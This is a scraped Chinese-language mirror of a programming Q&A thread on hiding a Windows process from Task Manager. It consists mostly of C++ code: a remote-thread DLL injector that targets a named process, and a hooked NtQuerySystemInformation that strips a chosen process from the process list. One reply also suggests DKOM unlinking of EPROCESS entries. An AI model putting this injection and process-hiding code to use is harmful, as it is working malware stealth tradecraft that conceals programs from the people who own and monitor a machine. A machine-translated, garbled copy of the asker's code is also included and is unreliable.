Windows 对任务管理器隐藏进程_Windows_C++_Process

Windows 对任务管理器隐藏进程

windows c++ process

Windows 对任务管理器隐藏进程,windows,c++,process,Windows,C++,Process,我试图对taskmanager隐藏一个进程，但它不起作用。我不明白为什么提前谢谢你的帮助这是我的函数，它注入了hider_dll.dll： int Inject(char* dll) { int pid = getpid(); HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid); if(hProc) { cout<<"OpenProcess success"<<

我试图对taskmanager隐藏一个进程，但它不起作用。我不明白为什么

提前谢谢你的帮助

这是我的函数，它注入了hider_dll.dll：

int Inject(char* dll)
{
    int pid = getpid();

    HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
    if(hProc)
    {
        cout<<"OpenProcess success"<<endl;
    }
    else
    {
        cout<<"OpenProcess failed..."<<endl;
        return 0;
    }
    LPVOID Vmem=VirtualAllocEx(hProc,0,strlen(dll)+1,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
    DWORD wrt;
    WriteProcessMemory(hProc,Vmem,dll,strlen(dll),(SIZE_T*)&wrt);



    stringstream sstr;
    sstr << wrt;
    string str = sstr.str();

    cout<<"Writed "+str+" bytes"<<endl;

    FARPROC LoadLib=GetProcAddress(LoadLibrary(L"kernel32.dll"),"LoadLibraryA");
    HANDLE h=CreateRemoteThread(hProc,0,0,(LPTHREAD_START_ROUTINE)LoadLib,Vmem,0,0);
    if(h)
    {
        cout<<"CreateRemoteThread success"<<endl;
    }
    else
    {
        cout<<"CreateRemoteThread failed\r\nError:"<<GetLastError()<<endl;
        return 0;
    }
    WaitForSingleObject(h,INFINITE);
    DWORD exit;
    GetExitCodeThread(h,&exit);
    cout<<"Dll loaded to "<<exit<<endl;
    return 1;
    }

int注入（char*dll）
{
int pid=getpid（）；
HANDLE hProc=OpenProcess（PROCESS\u ALL\u ACCESS，false，pid）；
如果（hProc）
{
cout这是一个合适的注射器：
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>

DWORD GetProcId(const char* procName)
{
    DWORD procId = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnap != INVALID_HANDLE_VALUE)
    {
        PROCESSENTRY32 procEntry;
        procEntry.dwSize = sizeof(procEntry);

        if (Process32First(hSnap, &procEntry))
        {
            do
            {
                if (!_stricmp(procEntry.szExeFile, procName))
                {
                    procId = procEntry.th32ProcessID;
                    break;
                }
            } while (Process32Next(hSnap, &procEntry));
        }
    }
    CloseHandle(hSnap);
    return procId;
}

int main()
{
    const char* dllPath = "C:\\Users\\'%USERNAME%'\\Desktop\\dll.dll"; //
    const char* procName = "processname.exe"; //
    DWORD procId = 0;

    while (!procId)
    {
        procId = GetProcId(procName);
        Sleep(30);
    }

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, 0, procId);

    if (hProc && hProc != INVALID_HANDLE_VALUE)
    {
        void* loc = VirtualAllocEx(hProc, 0, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        WriteProcessMemory(hProc, loc, dllPath, strlen(dllPath) + 1, 0);

        HANDLE hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, loc, 0, 0);

        if (hThread)
        {
            CloseHandle(hThread);
        }
    }

    if (hProc)
    {
        CloseHandle(hProc);
    }
    return 0;
}

首先，您没有复制dll
指向的字符串末尾的终止符。请尝试将其设置为strlen（dll）+1。PS：您还可以通过操纵EPROCESS的Flink和Blink字段来启动DKOM（从驱动程序），尽管PatchGuard会捕获它
// Hooked function
NTSTATUS WINAPI HookedNtQuerySystemInformation(
    __in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout    PVOID                    SystemInformation,
    __in       ULONG                    SystemInformationLength,
    __out_opt  PULONG                   ReturnLength
)
{
    NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);
    if (SystemProcessInformation == SystemInformationClass && STATUS_SUCCESS == status)
    {
        // Loop through the list of processes
        PMY_SYSTEM_PROCESS_INFORMATION pCurrent = NULL;
        PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)
            SystemInformation;

        do
        {
            pCurrent = pNext;
            pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->
                NextEntryOffset);
            if (!wcsncmp(pNext->ImageName.Buffer, L"notepad.exe", pNext->ImageName.Length))
            {
                if (!pNext->NextEntryOffset)
                {
                    pCurrent->NextEntryOffset = 0;
                }
                else
                {
                    pCurrent->NextEntryOffset += pNext->NextEntryOffset;
                }
                pNext = pCurrent;
            }
        } while (pCurrent->NextEntryOffset != 0);
    }
    return status;
}